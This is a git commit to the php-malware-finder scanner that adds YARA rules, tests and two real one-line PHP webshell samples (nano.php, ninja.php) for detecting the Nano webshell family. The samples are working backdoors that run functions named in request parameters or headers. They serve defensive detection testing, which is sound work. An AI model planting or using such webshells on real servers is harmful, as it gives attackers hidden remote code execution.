summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorjvoisin2018-05-29 13:20:40 +0200
committerjvoisin2018-05-29 13:20:40 +0200
commita5cc4cccc1a6c66210056194b8bd5638855fd09b (patch)
tree8a674afc56bc5bdc099b8ea33ea061af562e4ae9
parent9c4fb73b330e10395e1627d73e46a855e236ad29 (diff)
Add detection for Nano
[Nano]( https://github.com/UltimateHackers/nano ) is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
Diffstat
-rw-r--r--README.md1
-rw-r--r--php-malware-finder/php.yar2
-rw-r--r--php-malware-finder/samples/real/nano.php1
-rw-r--r--php-malware-finder/samples/real/ninja.php1
-rwxr-xr-xphp-malware-finder/tests.sh3
5 files changed, 8 insertions, 0 deletions
diff --git a/README.md b/README.md
index 01d1401..c458785 100644
--- a/README.md
+++ b/README.md
@@ -38,6 +38,7 @@ The following list of encoders/obfuscators/webshells are also detected:
38* [web-malware-collection]( https://github.com/nikicat/web-malware-collection ) 38* [web-malware-collection]( https://github.com/nikicat/web-malware-collection )
39* [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ ) 39* [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ )
40* [novahot]( https://github.com/chrisallenlane/novahot ) 40* [novahot]( https://github.com/chrisallenlane/novahot )
41* [nano]( https://github.com/UltimateHackers/nano )
41 42
42 43
43Of course it's **trivial** to bypass PMF, 44Of course it's **trivial** to bypass PMF,
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index f0abcb4..143b192 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -65,6 +65,8 @@ rule ObfuscatedPhp
65 $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k 65 $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k
66 $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher 66 $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher
67 $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/ // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html 67 $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/ // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html
68 $nano = /\$[a-z0-9-_]+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano
69 $ninja = /base64_decode[^;]+getallheaders/ //https://github.com/UltimateHackers/nano
68 $variable_variable = /\${\$[0-9a-zA-z]+}/ 70 $variable_variable = /\${\$[0-9a-zA-z]+}/
69 $too_many_chr = /(chr\([\d]+\)\.){8}/ // concatenation of more than eight `chr()` 71 $too_many_chr = /(chr\([\d]+\)\.){8}/ // concatenation of more than eight `chr()`
70 $concat = /(\$[^\n\r]+\.){5}/ // concatenation of more than 5 words 72 $concat = /(\$[^\n\r]+\.){5}/ // concatenation of more than 5 words
diff --git a/php-malware-finder/samples/real/nano.php b/php-malware-finder/samples/real/nano.php
new file mode 100644
index 0000000..14df255
--- /dev/null
+++ b/php-malware-finder/samples/real/nano.php
@@ -0,0 +1 @@
<?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);
diff --git a/php-malware-finder/samples/real/ninja.php b/php-malware-finder/samples/real/ninja.php
new file mode 100644
index 0000000..fdace58
--- /dev/null
+++ b/php-malware-finder/samples/real/ninja.php
@@ -0,0 +1 @@
<?$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index f4d9e06..aa6cd33 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -86,6 +86,9 @@ run_test real/ice.php 'double_var'
86run_test real/srt.php '$register_function' 86run_test real/srt.php '$register_function'
87run_test real/awvjtnz.php '$reversed:' 87run_test real/awvjtnz.php '$reversed:'
88run_test real/exceptions.php '$eval_comment: eval/\*k\*/(' 88run_test real/exceptions.php '$eval_comment: eval/\*k\*/('
89run_test real/nano.php '$nano: $x\[f\]('
90run_test real/ninja.php '$nano: $x\[0\]('
91run_test real/ninja.php '$ninja: base64_decode(substr(getallheaders'
89 92
90run_test undetected/smart.php '0x6:$extract:' 93run_test undetected/smart.php '0x6:$extract:'
91 94